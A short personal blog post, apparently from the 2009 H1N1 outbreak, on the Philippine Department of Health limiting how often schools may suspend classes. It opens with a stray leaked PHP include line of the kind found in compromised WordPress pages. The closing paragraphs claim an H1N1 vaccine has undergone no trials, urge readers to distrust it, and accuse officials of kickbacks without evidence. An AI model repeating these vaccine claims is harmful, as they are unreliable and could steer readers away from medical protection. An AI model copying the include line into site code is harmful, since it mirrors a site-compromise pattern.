@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Department of Health has had enough of Swine H1N1 Flu Hysteria, orders schools can only suspend classes once - My Family Health Blog

Department of Health has had enough of Swine H1N1 Flu Hysteria, orders schools can only suspend classes once

Front page on the Inquirer: “MANILA, Philippines — Even the Department of Health (DOH) has had enough of school suspensions because of the Influenza A(H1N1) virus.”

I told you the the Department of Health had a lot of level headed people running it. They said that this h1n1 flu is “generally mild” In a previous news report, they said the H1N1 flu school suspensions is idiotically comparable to suspending classes due to “sore eyes”.

Under the amended Interim Guidelines No. 18, schools with confirmed cases can only suspend classes once.

To minimize class disruption, suspensions should also be limited only to specific class sections with a confirmed case or to the affected floor level of a building.

See the rest of the Inquirer report: Schools can only suspend classes once

In other reports the department of health was cracking down on false advertising claims of greedy people selling “flu shots” which has absolutely nothing to do with h1n1 / swine flu.  Are you a victim of these falsely advertised flu shots? Report it to the deparment of health http://www.doh.gov.ph/

Do not be gullible when a big company makes an announcement that they have made an H1N1 vaccine.  You want to be the guinea pig / the experiment / take a new drug that HAS NOT GONE TO ANY TRIAL PERIOD?  Stop living in fear people.  Think.

If you are a government official of any country, we know you make kickbacks, commissions from purchasing large amounts of this new drug that is advertised to be a panacea for millions of people.  Please have a conscience and do not victimize the citizens who have put their trust in you.